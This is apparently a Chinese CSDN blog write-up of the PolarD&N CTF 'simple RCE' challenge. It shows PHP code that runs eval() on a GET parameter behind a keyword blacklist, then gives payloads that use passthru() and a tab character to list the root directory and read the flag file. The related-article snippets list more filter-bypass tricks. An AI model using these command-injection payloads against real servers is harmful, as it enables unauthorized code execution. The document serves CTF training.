polar CTF 简单rce

最新推荐文章于 2024-07-17 13:49:51 发布
最新推荐文章于 2024-07-17 13:49:51 发布
阅读量653 收藏 8
点赞数 9
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36286161/article/details/135375064
版权
文章讨论了PHP代码中的passthru()函数,如何被恶意利用进行命令执行,展示了两个攻击场景,包括get和post方法,以及如何通过设置特定参数触发系统命令获取文件列表或flag。
摘要由CSDN通过智能技术生成

一、题目

<?php
/*

PolarD&N CTF

*/
highlight_file(__FILE__);
function no($txt){
    if(!preg_match("/cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen| /i", $txt)){
    return $txt;}
   else{
die("what's up");}}
$yyds=($_POST['yyds']);
if(isset($_GET['sys'])&&$yyds=='666'){
  eval(no($_GET['sys']));
  }
  else
    {echo "nonono";
}
?> nonono

二、解题
1、知识

passthru() 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。(替换system)

payload

get
?sys=passthru('ls%09/');

post
yyds=666

在这里插入图片描述
payload

get
?sys=passthru('sort%09/flag');

post
yyds=666

在这里插入图片描述

samRsa
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
polarDB for Pgsql
08-26
阿里云的rpm安装包
polardb-jdbc18.zip
10-20
PolarDB-JDBC驱动详解》 PolarDB-JDBC18是一款专为阿里云PolarDB数据库设计的Java数据库连接驱动,它基于JDBC(Java Database Connectivity)接口,为开发者提供了一种在Java应用程序中访问和操作PolarDB数据库的...
PolarD&N】刷题记录
青青很OK的博客
03-26 822
空格绕过:<,<>,${IFS},$IFS,%20(space),%09(tab),$IFS$9,$IFS$1。所以需要先输入a=flag,这样就有了$a=$flag,再输入flag=a,把flag值拿回来。3.保存修改后的id,再去点击id修改为9的那款奶茶,获得flag。2.根据代码尝试绕过,查看根目录下的内容,发现了flag。明面上给的flag是一个虚假的flag,提交发现是错误的。看到了一个didi,联想到给的提示,改成yes后放包。前一个输入三个.一个/过滤后剩一个.与后面的./拼接。
polarctf靶场 【web】签到题、简单 rce、蜜雪冰城吉警店、到底给不给flag呢
m0_73981089的博客
04-24 1193
此时注意GET数组的值,$ _GET["flag"]=Polar​,而经过$_POST​的变量覆盖,​$ _GET =array(1) { ["flag"]=> string(4) "flag" }<span> </span>​,故而最开始传GET参数时?并且value不能等于flag,若想输出执行到最后输出flag,那么变量覆盖时候不能将$flag 的值等于除flag 外的任意值,也就是说在foreach内的变量覆盖过程,需要实现。这样被解析之后,就是c=flag&flag=c。方法二:字符串转义绕过;
PolarD&N(简单rce
果粒程
04-16 521
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-i7IKevHK-1681605902192)(D:\网安笔记\图片\image-20230415190913908.png)]
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 2579
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
PolarD&N_PWN_Choice
Kuluha的博客
10-14 193
当v4等于1时,选择Data1,当v4等于2时,选择Data2,如果v4不等用于1或2,则执行Data3.那么我们只要通过向scanf发送不等于1或2的数,就可以执行Data3。PS:怎么选择Data3呢,感觉在好多人眼里这是一个再简单不过的问题,但是在以前这个问题难倒了我好一阵,所以,我选择在这里开一个小讲堂帮助一下那些跟我一样不知道也不敢问的家人们,大家可以各取所需。在主函数中我们发现三个选项,分别为Data1/2/3,我们分别点开函数发现,三者中唯有Data3存在足够的溢出可以使我们进一步操作。
PolarD&N-CTF-web方向-中等
J1ng_Hong的博客
12-12 1618
(由于发现中等题里面有许多新的知识点,所以特意拉了一个新的博客来展示)
PHP是世界上最好的语言-PolarD&N XXF无参数RCE QUERY_STRING 特性
m0_64180167的博客
12-17 488
这个靶场我之前看到过打广告,而且感觉比较新 来坐坐这里还是。
polar编码实现逻辑
05-23
polar编码实现逻辑
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
pola.rar_polar
09-19
标题中的“pola.rar_polar”暗示了这是一个与Polar相关的RAR压缩文件,可能是包含了一些示例代码或者项目实例。Polar通常指的是PolarDB,阿里巴巴的一款分布式数据库系统,它以其高性能、高可扩展性和低成本而闻名。...
PolarD&N靶场题解
qq_43423311的博客
03-23 2561
PolarD&N CTF靶场。
[MRCTF2020]Ez_bypass 学习笔记
weixin_45869407的博客
11-01 374
这道题也就是一道简单的代码审计题,我将代码稍微整理了一下 <?php $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg)
[PolarD&N]题解——03ret2syscall_32
2301_80238613的博客
10-13 174
决定利用gets()函数的溢出,去构造execve("/bin/sh", 0, 0)。存在ebx,ecx,edx连续的寄存器,选取连续的即可。题目名称:03ret2syscall_32。题目来源:PolarD&N靶场(是一个32位静态的题目!如有错误欢迎大佬指正!
Polar靶场 简单难度
konpure的博客
12-26 1302
该代码中存在str_ireplace()函数,该函数的具体作用就是在第三个参数中寻找第一个参数,找到后替换成第二个参数的值,第四个参数(可不写)记录替换次数,于是我们在上传木马文件时将后缀由php改为pphphp。用该jwt代替原有的jwt值发包,发送之后发现什么也没有,查看了wp之后得知用户名应该是admin而不是admin,于是再用admin作为id得到新的jwt,替换后发包,在密码处得到flag。发现cookie为user=user,抓包将user修改为admin后上传,得到flag。
Polar_D&N[MISC]大礼包
m0_73720466的博客
10-15 106
因为flag格式是flag{},想到栅栏密码对其进行解密(https://www.qqxiuzi.cn/bianma/zhalanmima.php)1) 根据加密压缩包的注释得出密码是6位以上,用ARCHPR工具限定纯数字,7-8位爆破得到密码“9635421”在图片尾部得到一串base32,解码得到base64,再解码后得到明文sn{bvr1_0yytcyp_fp0}得到synt{cbyvpr_1f_p00y},再解一次凯撒密码(移位数是13)得到flag。
PHP-RCE绕过的姿势总结
有时候,想要一块二向箔
02-18 7948
一、命令执行空格过滤取反绕过命令分隔符黑名单绕过(比如flag字符)拼接二、代码执行总结参考文章 前言 做了很多的题目,静下心来学习大佬做点小总结 一、命令执行 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 取反绕过 取反两次就可以得到想要绕过限制的数据 传参时 ?code=(~%8F%97%8F%96%91%99%90)(); 在做NSS平台上的一道rce题目就是用到类似的思路,
提升无线网络安全:用Python脚本发现并修复WiFi安全问题
最新发布
m0_68483928的博客
07-17 508
文章详细介绍了如何使用Python脚本和一些强大的开源工具来捕获和测试WPA/WPA2握手。通过上述步骤,您可以在本地测试WiFi密码的安全性,并了解其潜在的漏洞。最后,选择指定密码本进行爆破(我这里的是从网络上收集的,大家可以自行去收集,或者评论或私信我获取)在本文中,我们将介绍并展示如何使用Python脚本来破解WiFi密码。首先,它会验证路由器的MAC地址(BSSID)是否格式正确,例如00:77:88:33:44:55。工具,通过提供的单词表文件来获取密码。·命令查看路由器的网卡地址,并输入。
polar transform
11-11
Polar Transform是一种图像处理技术,它可以将直角坐标系下的图像转换为极坐标系下的图像。在极坐标系下,图像的中心点被定义为原点,图像的每个像素点被表示为它们的极径和极角。这种转换可以用于减小两种视角图像的域差异,从而提高图像检索的性能。在极坐标系下,图像的旋转和缩放变得更加容易,因此Polar Transform也被广泛应用于图像处理和计算机视觉领域。 下面是一个使用OpenCV库实现Polar Transform的Python代码示例: ```python import cv2 import numpy as np # 读取图像 img = cv2.imread('image.jpg') # 将图像转换为灰度图像 gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 计算图像中心点 height, width = gray.shape center = (width // 2, height // 2) # 计算图像的最大半径 radius = int(np.sqrt((height / 2) ** 2 + (width / 2) ** 2)) # 进行Polar Transform polar = cv2.linearPolar(gray, center, radius, cv2.WARP_FILL_OUTLIERS) # 显示原始图像和Polar Transform后的图像 cv2.imshow('Original Image', img) cv2.imshow('Polar Transform', polar) cv2.waitKey(0) cv2.destroyAllWindows() ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

samRsa

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值